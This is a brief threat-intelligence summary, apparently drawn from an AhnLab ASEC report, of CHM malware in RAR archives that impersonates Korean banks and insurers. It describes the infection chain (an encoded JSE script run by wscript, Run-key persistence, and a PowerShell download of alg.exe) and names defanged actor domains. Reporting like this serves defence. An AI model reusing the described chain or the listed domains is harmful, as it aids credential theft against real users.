AhnLab ASEC reported CHM malware distributed in RAR archives that impersonated Korean financial institutions and insurance companies with themes such as credit-card limits, insurance-fee withdrawal results, and banking contracts. When opened, the CHM decompiled content under C:\Users\Public\Libraries and executed an encoded Docs.jse script through wscript. The script added persistence through the Run key and used PowerShell to download an additional payload as %tmp%\alg.exe from actor-controlled URLs such as ppangz[.]mom and crilts[.]cfd. ASEC warned that the downloaded malware could perform follow-on actions including information theft, making the lure set a targeted Korean social-engineering and downloader threat.